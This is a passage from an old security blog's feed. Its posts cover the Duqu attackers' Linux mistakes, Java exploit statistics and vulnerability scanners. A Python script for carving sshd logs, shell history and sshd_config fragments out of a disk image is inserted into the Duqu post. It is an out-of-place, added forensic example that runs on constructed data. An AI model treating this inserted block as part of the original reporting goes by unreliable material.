administration. At one point, they referenced the sshd_config manual, 
and at another juncture, they needed to check documentation for the 
Linux ftp client. They also botched the command line syntax for the 
Linux iptables.&lt;br /&gt;
&lt;br /&gt;


&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; The attackers also left behind traces of changes they made to the 
sshd_config file. One of them speeds up port redirections over tunnels, 
which is a simple enough change to understand. The other enabled Kerberos 
authentication. The Kaspersky researchers still aren't sure what the 
motive is for the latter modification.&lt;br /&gt;


So far, the researchers say, they've analyzed only a fraction of 
compromised servers, which among other places, were located in 
Singapore, Switzerland, the UK, the Netherlands, Belgium, and South 
Korea. It will be interesting to see what evidence they're able to 
exhume from additional machines. In the meantime they're hoping Linux 
admins can help them ponder a few questions, including:&lt;br /&gt;


&lt;ul&gt;
&lt;li&gt;Why the preoccupation with updating OpenSSH 4.3 to version 5.8 as soon as a machine had been commandeered?&lt;/li&gt;
&lt;/ul&gt;
and&lt;br /&gt;


&lt;ul&gt;
&lt;li&gt;Is there any relationship between the updates and the modification to “GSSAPIAuthentication yes” made to the sshd_config file?&lt;/li&gt;
&lt;/ul&gt;
“We hope that through cooperation and working together we can cast 
more light on this huge mystery of the Duqu trojan,” Kamluk wrote. 
Tipsters can reach his team at “stopduqu AT Kaspersky DOT com.”&lt;br /&gt;
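An added illustration of the kind of recovery the Kaspersky quote and the sshd.log and bash-history paragraphs describe (this is not Kaspersky's tooling, and the disk image, log lines and 203.0.113.x addresses are constructed): a small carver that walks a raw image for printable runs, classifies them, and checks a recovered sshd_config fragment for non-default directives such as GSSAPIAuthentication.

```python
"""
Carve surviving text fragments out of a raw disk image: sshd log lines,
shell history and sshd_config directives of the kind the post says were
recovered from deleted files' blocks.  Added example for this post, not
Kaspersky's tooling; the image, log lines and addresses are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# A deleted file's data blocks stay on disk until the file system reuses them,
# so scanning every byte of the image (allocated or not) can turn up old content.
# Any run of at least 16 printable bytes is a candidate fragment.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e\n\t]{16,}")

# Classifiers for the trace types discussed in the post.  The patterns are
# this example's own assumptions, not indicators taken from the investigation.
KINDS = [
    ("sshd_log", re.compile(rb"sshd\[\d+\]: (Accepted|Failed|Received disconnect)")),
    ("sshd_config", re.compile(rb"^(GSSAPIAuthentication|Port|UseDNS|PermitRootLogin)\s", re.M)),
    ("bash_history", re.compile(rb"^(man|ftp|iptables|ssh|vi|wget)\b", re.M)),
]

# sshd defaults that matter here (sshd_config(5): GSSAPIAuthentication is "no").
SSHD_DEFAULTS = {"gssapiauthentication": "no", "port": "22"}


@dataclass
class Fragment:
    offset: int   # byte offset in the image
    kind: str
    text: str


def carve_fragments(image: bytes) -> list[Fragment]:
    """Return every printable run in the image, tagged with the first matching kind."""
    found = []
    for m in PRINTABLE_RUN.finditer(image):
        run = m.group(0)
        kind = "unclassified"
        for name, pattern in KINDS:
            if pattern.search(run):
                kind = name
                break
        found.append(Fragment(m.start(), kind, run.decode("ascii")))
    return found


def interesting(fragments: list[Fragment]) -> list[Fragment]:
    """Drop runs that none of the classifiers recognised."""
    return [f for f in fragments if f.kind != "unclassified"]


def nondefault_directives(config_text: str) -> dict[str, str]:
    """Directives in a recovered sshd_config fragment whose value differs from the
    sshd default, e.g. the 'GSSAPIAuthentication yes' change the post asks about."""
    changed = {}
    for line in config_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key in SSHD_DEFAULTS and SSHD_DEFAULTS[key] != value:
            changed[key] = value
    return changed


# --- constructed sample image -------------------------------------------------
# The first log line is cut mid-way, as a partially overwritten log would be.
SSHD_LOG_FRAGMENT = (
    b"ckey for root from 203.0.113.7 port 51022 ssh2\n"
    b"Oct 20 03:15:02 srv sshd[2140]: Accepted publickey for root from 203.0.113.7 port 51030 ssh2\n"
)
BASH_HISTORY_FRAGMENT = b"man sshd_config\nvi /etc/ssh/sshd_config\nman ftp\niptables -L -n\n"
SSHD_CONFIG_FRAGMENT = b"# old copy of sshd_config\nPort 22\nGSSAPIAuthentication yes\n"


def opaque(n: int, seed: int) -> bytes:
    """Filler bytes in 0x80-0xff: never printable, so they cannot join a run."""
    return bytes(0x80 + ((i * 7 + seed) % 128) for i in range(n))


def build_sample_image() -> bytes:
    """Stand-in for a dd image: opaque blocks with text left behind by deleted files."""
    return (opaque(4096, 1) + SSHD_LOG_FRAGMENT + opaque(1024, 2)
            + BASH_HISTORY_FRAGMENT + opaque(512, 3)
            + SSHD_CONFIG_FRAGMENT + opaque(2048, 4))


if __name__ == "__main__":
    for frag in interesting(carve_fragments(build_sample_image())):
        print(f"offset {frag.offset:#08x} [{frag.kind}]")
        print("    " + frag.text.replace("\n", "\n    ").rstrip())
        if frag.kind == "sshd_config":
            print("    non-default directives:", nondefault_directives(frag.text))
```

On a real case the same scan would run over the raw partition image rather than the constructed buffer, and the classifier list would be extended with whatever the investigation is looking for.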
&lt;br /&gt;
(* &lt;b&gt;Duqu&lt;/b&gt; : Duqu is a malicious computer virus that is designed to gather 
intelligence data from entities such as industrial control manufacturers
 in order to be able to launch a future attack on an industrial control 
facility.)&lt;br /&gt;
&lt;br /&gt;
Source : The Register. &lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/5973375854988960469/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/duqu-attackers-linux-rookies-master.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/5973375854988960469?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/5973375854988960469?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/dXhlOErmI7Q/duqu-attackers-linux-rookies-master.html" title="Duqu attackers:  Linux rookies, master coders, Amateurs Mistakes" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-u7U4kQCIXbU/Ttj5zOl95UI/AAAAAAAAAA4/FQQy5iC6HsI/s72-c/12055-trojan_article.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/duqu-attackers-linux-rookies-master.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0EGSXo6fSp7ImA9WhRRF0o.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-545312322346178798</id><published>2011-12-01T21:30:00.001Z</published><updated>2011-12-01T21:40:28.415Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-01T21:40:28.415Z</app:edited><title>Nearly half of the attacks exploit vulnerabilities in Java default updates !!</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Nearly half&lt;/span&gt; &lt;span class="hps"&gt;of the attacks&lt;/span&gt; &lt;span class="hps"&gt;exploit&lt;/span&gt; &lt;span class="hps"&gt;vulnerabilities&lt;/span&gt; &lt;span class="hps"&gt;in Java &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;default&lt;/span&gt; &lt;span class="hps"&gt;updates&lt;/span&gt;&lt;span&gt;, according to the&lt;/span&gt; &lt;span class="hps"&gt;Microsoft&lt;/span&gt; &lt;span class="hps"&gt;Security Intelligence&lt;/span&gt; &lt;span class="hps"&gt;Report.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; The&lt;/span&gt; &lt;span class="hps"&gt;exploits against&lt;/span&gt; &lt;span class="hps"&gt;computer security&lt;/span&gt; &lt;span class="hps"&gt;in the first half&lt;/span&gt; &lt;span class="hps"&gt;of 2011&lt;/span&gt; &lt;span class="hps"&gt;were largely&lt;/span&gt; &lt;span class="hps"&gt;associated with the&lt;/span&gt; &lt;span class="hps"&gt;vulnerabilities&lt;/span&gt; &lt;span class="hps"&gt;of the family of&lt;/span&gt; &lt;span class="hps"&gt;Java&lt;/span&gt; &lt;span class="hps"&gt;products&lt;/span&gt;&lt;span class=""&gt;, technology&lt;/span&gt; &lt;span class="hps"&gt;maintained by&lt;/span&gt; &lt;span class="hps"&gt;Oracle.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; The report &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;Security&lt;/span&gt; &lt;span class="hps"&gt;Intelligence&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&lt;/span&gt; of &lt;span class="hps"&gt;Microsoft&lt;/span&gt; said &lt;span class="hps"&gt;&lt;/span&gt;&lt;span class="hps"&gt;&lt;/span&gt; &lt;span class="hps"&gt;indeed a&lt;/span&gt; &lt;span class="hps"&gt;record&lt;/span&gt;&lt;span&gt;:&lt;/span&gt; &lt;span class="hps"&gt;one-third to&lt;/span&gt; &lt;span class="hps"&gt;half of the&lt;/span&gt; &lt;span class="hps"&gt;exploits&lt;/span&gt; &lt;span class="hps"&gt;are due to&lt;/span&gt; &lt;span class="hps"&gt;flaws in&lt;/span&gt; &lt;span class="hps"&gt;the runtime environment&lt;/span&gt; &lt;span class="hps"&gt;(JRE&lt;/span&gt;&lt;span&gt;)&lt;/span&gt; &lt;span class="hps"&gt;Virtual Machine&lt;/span&gt; &lt;span class="hps"&gt;(JVM&lt;/span&gt;&lt;span&gt;) and the&lt;/span&gt; &lt;span class="hps"&gt;JDK.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://idelways.developpez.com/news/images/java-exploits.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://idelways.developpez.com/news/images/java-exploits.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;Oracle does&lt;/span&gt; &lt;span class="hps"&gt;not unduly&lt;/span&gt; &lt;span class="hps"&gt;slow&lt;/span&gt; &lt;span class="hps"&gt;to offer&lt;/span&gt; &lt;span class="hps"&gt;patches&lt;/span&gt;&lt;span&gt;, the&lt;/span&gt; &lt;span class="hps"&gt;problem lies in&lt;/span&gt; &lt;span class="hps"&gt;their spread&lt;/span&gt;&lt;span&gt;, diagnostic&lt;/span&gt; &lt;span class="hps"&gt;Tim&lt;/span&gt; &lt;span class="hps"&gt;Rains&lt;/span&gt;&lt;span class=""&gt;, director of&lt;/span&gt; &lt;span class="hps"&gt;Trustworthy Computing&lt;/span&gt; &lt;span class="hps"&gt;at&lt;/span&gt; &lt;span class="hps"&gt;Microsoft.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; "Many of the&lt;/span&gt; &lt;span class="hps"&gt;faults&lt;/span&gt; &lt;span class="hps"&gt;most commonly&lt;/span&gt; &lt;span class="hps"&gt;used&lt;/span&gt; &lt;span class="hps"&gt;Java&lt;/span&gt; &lt;span class="hps"&gt;is old&lt;/span&gt;&lt;span&gt;, and&lt;/span&gt; &lt;span class="hps"&gt;had had&lt;/span&gt; &lt;span class="hps"&gt;security&lt;/span&gt; &lt;span class="hps"&gt;updates&lt;/span&gt; &lt;span class="hps"&gt;for years&lt;/span&gt;&lt;span&gt;."&lt;/span&gt; &lt;span class="hps"&gt;Thus,&lt;/span&gt; &lt;span class="hps"&gt;the solutions used&lt;/span&gt; &lt;span class="hps"&gt;by the attackers&lt;/span&gt; &lt;span class="hps"&gt;are&lt;/span&gt; &lt;span class="hps"&gt;long, because&lt;/span&gt; &lt;span class="hps"&gt;the attackers&lt;/span&gt; &lt;span class="hps"&gt;who develop,&lt;/span&gt; &lt;span class="hps"&gt;or redeem&lt;/span&gt; &lt;span class="hps"&gt;kits&lt;/span&gt; &lt;span class="hps"&gt;hackers&lt;/span&gt; &lt;span class="hps"&gt;continue to&lt;/span&gt; &lt;span class="hps"&gt;get&lt;/span&gt; &lt;span class="hps"&gt;a positive return on&lt;/span&gt; &lt;span class="hps"&gt;investment,&lt;/span&gt; &lt;span class="hps"&gt;observes&lt;/span&gt; &lt;span class="hps"&gt;Tim&lt;/span&gt; &lt;span class="hps"&gt;Rains.&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; For example&lt;/span&gt;&lt;span&gt;, the&lt;/span&gt; &lt;span class="hps"&gt;most exploited&lt;/span&gt; &lt;span class="hps"&gt;vulnerability&lt;/span&gt; &lt;span class="hps"&gt;(CVE-2010&lt;/span&gt;&lt;span class="atn"&gt;-&lt;/span&gt;&lt;span&gt;0840,&lt;/span&gt; &lt;span class="hps"&gt;affecting the&lt;/span&gt; &lt;span class="hps"&gt;JRE&lt;/span&gt;&lt;span class=""&gt;) was&lt;/span&gt; &lt;span class="hps"&gt;revised&lt;/span&gt; &lt;span class="hps"&gt;in March 2010 and&lt;/span&gt; &lt;span class="hps"&gt;waited until the&lt;/span&gt; &lt;span class="hps"&gt;last quarter&lt;/span&gt; &lt;span class="hps"&gt;of that year&lt;/span&gt; &lt;span class="hps"&gt;to gain&lt;/span&gt; &lt;span class="hps"&gt;popularity among&lt;/span&gt; &lt;span class="hps"&gt;malicious&lt;/span&gt; &lt;span class="hps"&gt;hackers&lt;/span&gt;&lt;span class=""&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; The problem is&lt;/span&gt; &lt;span class="hps"&gt;further exacerbated&lt;/span&gt; &lt;span class="hps"&gt;as&lt;/span&gt; &lt;span class="hps"&gt;often&lt;/span&gt;&lt;span class=""&gt;, several&lt;/span&gt; &lt;span class="hps"&gt;major versions of&lt;/span&gt; &lt;span class="hps"&gt;the runtime&lt;/span&gt; &lt;span class="hps"&gt;language&lt;/span&gt; &lt;span class="hps"&gt;coexist&lt;/span&gt; &lt;span class="hps"&gt;on the same machine&lt;/span&gt; &lt;span class="hps"&gt;(based&lt;/span&gt; &lt;span class="hps"&gt;solutions&lt;/span&gt; &lt;span class="hps"&gt;that require&lt;/span&gt; &lt;span class="hps"&gt;their presence&lt;/span&gt;&lt;span class=""&gt;).&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;The report from&lt;/span&gt; &lt;span class="hps"&gt;Microsoft&lt;/span&gt; &lt;span class="hps"&gt;based on the number&lt;/span&gt; &lt;span class="hps"&gt;of exploits&lt;/span&gt; &lt;span class="hps"&gt;arrested by&lt;/span&gt; &lt;span class="hps"&gt;the&lt;/span&gt; &lt;span class="hps"&gt;anti-malware&lt;/span&gt; &lt;span class="hps"&gt;solution&lt;/span&gt;&lt;span&gt;,&lt;/span&gt; &lt;span class="hps"&gt;blocked&lt;/span&gt; &lt;span class="hps"&gt;with&lt;/span&gt; &lt;span class="hps"&gt;27.5 million&lt;/span&gt; &lt;span class="hps"&gt;of attacks&lt;/span&gt; &lt;span class="hps"&gt;over the past 12&lt;/span&gt; &lt;span class="hps"&gt;months&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span class="hps"&gt;If&lt;/span&gt; &lt;span class="hps"&gt;Tim&lt;/span&gt; &lt;span class="hps"&gt;Rains&lt;/span&gt; &lt;span class="hps"&gt;prefers to&lt;/span&gt; &lt;span class="hps"&gt;emphasize the need&lt;/span&gt; &lt;span class="hps"&gt;for updates&lt;/span&gt; &lt;span class="hps"&gt;to users and&lt;/span&gt; &lt;span class="hps"&gt;sysadmins&lt;/span&gt;&lt;span class=""&gt;, Chester&lt;/span&gt; &lt;span class="hps"&gt;Wisniewski&lt;/span&gt; &lt;span class="hps"&gt;of Sophos&lt;/span&gt; &lt;span class="hps"&gt;will&lt;/span&gt; &lt;span class="hps"&gt;immediately&lt;/span&gt; &lt;span class="hps"&gt;advise&lt;/span&gt; &lt;span class="hps"&gt;to&lt;/span&gt; &lt;span class="hps"&gt;switch&lt;/span&gt; &lt;span class="hps"&gt;to&lt;/span&gt; &lt;span class="hps"&gt;Java:&lt;/span&gt; &lt;span class="hps"&gt;"Most&lt;/span&gt; &lt;span class="hps"&gt;people do not use&lt;/span&gt; &lt;span class="hps"&gt;Java&lt;/span&gt; &lt;span class="hps"&gt;nowadays&lt;/span&gt; &lt;span class="hps"&gt;and it&lt;/span&gt; &lt;span class="hps atn"&gt;[&lt;/span&gt;&lt;span&gt;does&lt;/span&gt; &lt;span class="hps"&gt;not 
install&lt;/span&gt; &lt;span class="hps"&gt;Java]&lt;/span&gt; &lt;span class="hps"&gt;reduces&lt;/span&gt; &lt;span class="hps"&gt;the attack surface&lt;/span&gt; &lt;span class="hps"&gt;from the Internet&lt;/span&gt;&lt;span&gt;, "says&lt;/span&gt; &lt;span class="hps"&gt;he&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; *&lt;b&gt;&lt;a href="http://www.microsoft.com/security/sir/default.aspx" target="_blank"&gt;Download the report&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Source : &lt;a href="http://blogs.technet.com/b/security/archive/2011/11/28/millions-of-java-exploit-attempts-the-importance-of-keeping-all-software-up-to-date.aspx" target="_blank"&gt;Official Microsoft Security Blog&lt;/a&gt;.&lt;br /&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/545312322346178798/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/nearly-half-of-attacks-exploit.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/545312322346178798?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/545312322346178798?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/MQDo5F34LiI/nearly-half-of-attacks-exploit.html" title="Nearly half of the attacks exploit vulnerabilities in Java default updates !!" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/nearly-half-of-attacks-exploit.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkINSHY-eSp7ImA9WhRRFk0.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-8603026563898943184</id><published>2011-11-29T22:43:00.001Z</published><updated>2011-11-29T23:16:39.851Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-29T23:16:39.851Z</app:edited><title>Predispose Your Security Risks Part 2</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2&gt;

&lt;span style="font-size: x-small;"&gt;&lt;span style="font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; As you discovred on the Predispose PART 1, the perpose of using the scanner in the companies is avoiding the hack of thier systms. Please complete reading this Chapter II off Predispose Your Security Risks.&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-RsKHj-YyO3s/TtVnw7qWanI/AAAAAAAAAAg/U0My6RypWeY/s1600/security_taxonomy_small.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-RsKHj-YyO3s/TtVnw7qWanI/AAAAAAAAAAg/U0My6RypWeY/s320/security_taxonomy_small.png" width="286" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2&gt;

Passive Aggressive :&lt;/h2&gt;
&lt;br /&gt;
Vulnerability scanners come as either 
passive or active devices, each of which have their advantages and 
disadvantages. Passive scanners are monitoring devices that work by 
sniffing the traffic that goes over the network between systems, looking
 for anything out of the ordinary. Their advantage is that they have no 
impact on the operation of the network and so can work 24 x 7 if 
necessary, but they can miss vulnerabilities particularly on more quiet 
parts of a network.&lt;br /&gt;
&lt;br /&gt;
Active scanners probe systems in much the way
 hackers would, looking for weaknesses through the responses devices 
make to the traffic the scanners send to them. They are more aggressive 
and in some ways more thorough than passive scanners, but they can cause
 service disruptions and crash servers.&lt;br /&gt;
&lt;br /&gt;
Many people see the two 
as complementary and recommend using passive and active scanners 
alongside each other. The passive scanners can provide the more 
continuous monitoring, while active scanners can be used periodically to
 flush out the cannier vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;

Software vs. Hardware :&lt;/h2&gt;
&lt;br /&gt;
The
 scanners can also come as either software-based agents placed directly 
on servers or workstations, or as hardware devices. Host-based scanners 
can use up processor cycles on the system, but are generally considered 
more flexible in the kinds of vulnerabilities they can scan. The 
network-based scanners are plug-and-play hardware devices that are 
self-contained and need less maintenance than software agents.&lt;br /&gt;
&lt;br /&gt;
The
 focus of vulnerabilities has been changing over the past several years.
 On the one hand, organizations have become savvier about protecting 
their networks and systems, and hackers have had a harder time 
penetrating those defenses. At the same time, as Web-based services have
 become the lifeblood of many businesses, hackers have found a goldmine 
of potential exploits.&lt;br /&gt;
&lt;br /&gt;
That’s because Web traffic flows back and 
forth primarily through Port 80 on a network, which has to be kept open 
if those Web-based services are to be available to a company’s customers
 and business partners.&lt;br /&gt;
&lt;br /&gt;
It’s a hard-to-defend weak spot in 
enterprise defenses, and once hackers gain access to Web applications 
they can use them to get information from databases, retrieve files from
 root directories, or use a Web server to send malicious content in a 
Web page to unsuspecting users.&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;

Interpreting the Results :&lt;/h2&gt;
&lt;br /&gt;
Vulnerability
 scanning works with Web applications by launching simulated attacks 
against those applications and then reports the vulnerabilities it finds
 with recommendations on how to fix or eliminate them.&lt;br /&gt;
&lt;br /&gt;
However, 
as powerful an addition as vulnerability scanning can be to the overall 
security of an enterprise, some observers advise caution in interpreting
 those results.&lt;br /&gt;
&lt;br /&gt;
Kevin Beaver, an independent security consultant 
with Atlanta-based Principal Logic, LLC, says it takes a combination of 
the vulnerability scanner and a human knowledge of the network and 
context in which the scans were carried out to accurately interpret the 
results.&lt;br /&gt;
&lt;br /&gt;
Left to themselves, he says, scanners will tend to spit out 
information that their vendors think is important. What’s also needed is
 an understanding of what was being tested at the time, how it was being
 tested, why the vulnerability is exploitable and so on. That will show 
whether vulnerabilities flagged as high priority actually are important 
in a particular user’s environment, and therefore whether it’s 
worthwhile putting in the effort to remediate them.&lt;br /&gt;
&lt;br /&gt;
You absolutely need vulnerability scanners, Beaver said, because they take a lot of the pain out of security assessments.&lt;br /&gt;
&lt;br /&gt;
“But you cannot rely on them completely,” he said. “A good tool plus the human context is the best equation for success.”&lt;br /&gt;
&lt;br /&gt;
I hope you'll find it useful, as I did. &lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/8603026563898943184/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/predispose-your-security-risks-part-2.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/8603026563898943184?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/8603026563898943184?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/Y6Zd8GCeIzU/predispose-your-security-risks-part-2.html" title="Predispose Your Security Risks Part 2" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-RsKHj-YyO3s/TtVnw7qWanI/AAAAAAAAAAg/U0My6RypWeY/s72-c/security_taxonomy_small.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/predispose-your-security-risks-part-2.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkEGR3Y_eCp7ImA9WhRRFk0.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-8116542860715709039</id><published>2011-11-29T22:22:00.001Z</published><updated>2011-11-29T23:17:06.840Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-29T23:17:06.840Z</app:edited><title>Predispose Your Security Risks Part 1</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Vulnerability scanning got its start as a tool for the hackers (the bad guys); now it's helping companies to penetration-test their own systems.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; For something that can be such an effective weapon against hackers, it’s ironic that vulnerability scanning got its start as a tool for the hackers themselves. Before they can get into networks, hackers need to know where the most vulnerable spots are in an enterprise’s security. That means using scanning tools to trawl for such things as open network ports or poorly secured applications and operating systems.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-RsKHj-YyO3s/TtVnw7qWanI/AAAAAAAAAAg/U0My6RypWeY/s1600/security_taxonomy_small.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-RsKHj-YyO3s/TtVnw7qWanI/AAAAAAAAAAg/U0My6RypWeY/s320/security_taxonomy_small.png" width="286" /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; In the past few years these intentions have been turned around, to where scanning tools now give the guys in the white hats (ethical* hackers) a good idea of where the vulnerabilities are and a chance to repair them before the crackers get there.

At least they provide the potential for that. The fact is, many companies don’t seem to be taking advantage of these tools or if they do have them, they are not making much use of them. Gartner Research believes as many as 85% of the network attacks that successfully penetrate network defenses are made through vulnerabilities for which patches and fixes have already been released.&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;


Unlimited Exploits :&lt;/h2&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Now there is the rapidly expanding universe of Web based applications for hackers to exploit. A recent study by security vendor Acunetix claimed that as many as 70% of the 3,200 corporate and non-commercial organization Web sites its free Web based scanner has examined since January 2006, contained serious vulnerabilities and were at immediate risk of being hacked.

A total of 210,000 vulnerabilities were found, the company said, for an average of some 66 vulnerabilities per web site ranging from potentially serious ones such as SQL injections and cross-site scripting, to relatively minor ones such as easily available directory listings.

“Companies, governments and universities are bound by law to protect our data,” said Kevin Vella, vice president of sales and operations at Acunetix. “Yet web application security is, at best, overlooked as a fad.”&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;


Patch Patrol :&lt;/h2&gt;
&lt;br /&gt;
Vulnerability scanners seek out known 
weaknesses, using databases that are constantly updated by vendors to 
track down devices and systems on the network that are open to attack. 
They look for such things as unsafe code, misconfigured systems, malware
